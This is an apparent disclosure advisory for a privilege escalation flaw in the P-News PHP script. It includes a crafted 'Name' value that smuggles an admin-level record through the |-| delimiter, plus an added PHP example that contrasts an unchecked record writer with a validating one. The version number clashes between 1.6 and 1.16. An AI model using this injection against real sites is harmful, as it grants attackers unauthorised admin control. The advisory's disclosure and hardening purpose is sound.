P-News version 1.6 is vulnerable to a privilege escalation attack because it allows a remote attacker to populate strings with the | character used for delimiting the data stored about the account.
Admin Access Vulnerability in P-News 1.6
Url: http://www.ppopn.net
It is possible to gain admin access if you possess a 'Member'
account due to a flaw in the 'p-news.php' file.
You can inject an entire arbitrary account, including all the fields, into
the 'Name' field. This pushes the account's real, restricting details to the
far end of the data string, so they are not included in the login process.
Below is an example of a normal database:
Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|
Notice the '0' denotes an 'admin' account, and the '2' denotes a 'member'
account.
Injecting:
Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-|
into the 'Name' field in the edit account information section will give the
malicious user admin privileges.
The database then looks like:
Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-||-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|
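The record handling described above, modeled as an added example that is not part of the original advisory and is not P-News source code. The function names and the field order (name, MD5 hash, level, e-mail) are assumptions read off the sample records; it puts a writer that joins fields unchecked beside one that rejects the delimiter.

```php
<?php
// Added example: a model of the flat-file format shown in the advisory.
// Function names and field order are assumptions, not P-News code.
const DELIM = '|-|';

// Reader: split on the delimiter and trust the first four positions.
function parse_record(string $line): array {
    $f = explode(DELIM, rtrim($line, "\r\n"));
    return ['name' => $f[0] ?? '', 'hash' => $f[1] ?? '',
            'level' => $f[2] ?? '', 'email' => $f[3] ?? ''];
}

// Weak writer: joins whatever the edit-account form supplied.
function write_record_weak(array $r): string {
    return implode(DELIM, [$r['name'], $r['hash'], $r['level'], $r['email']]) . DELIM;
}

// Hardened writer: no field may contain any character of the record
// framing. Rejecting every '|' (not just the full '|-|') also covers a
// field that ends in '|' or '|-' and would merge with the next delimiter.
function write_record_strict(array $r): string {
    foreach (['name', 'hash', 'level', 'email'] as $k) {
        if (strpbrk($r[$k], "|\r\n") !== false) {
            throw new InvalidArgumentException("illegal character in $k");
        }
    }
    return write_record_weak($r);
}

// Constructed input: the member record from the advisory, with the 'Name'
// value the advisory describes submitted through the edit-account form.
$member = ['name' => 'Peter', 'hash' => '179ad45c6ce2cb97cf1029e212046e81',
           'level' => '2', 'email' => 'peter@aol.com'];
$member['name'] = 'Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-|';

// The weak writer stores the line shown in the advisory; the reader then
// takes the level from the injected fields, not from the real ones.
$stored = parse_record(write_record_weak($member));
echo "weak writer, level read back: {$stored['level']}\n";

try {
    write_record_strict($member);
} catch (InvalidArgumentException $e) {
    echo "strict writer rejected update: {$e->getMessage()}\n";
}
```

Validating on write is the minimum; a reader that also rejects any line with more than the expected number of fields would catch records that were already tampered with.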
================================================================
Operating system and servicepack level:
Windows/Linux/Unix + PHP
Software:
P-News 1.16 (possibly 1.17)
Under what circumstances the vulnerability was discovered:
Under a vulnerability search.
If the vendor has been notified:
The vendor has not been notified because he does not speak English, so much
confusion may arise.
How to contact you for further information:
I can always be reached at peter4020@hotmail.com
Please credit this find to:
Peter Winter-Smith of Team UEC
Thank you for your time,
-Peter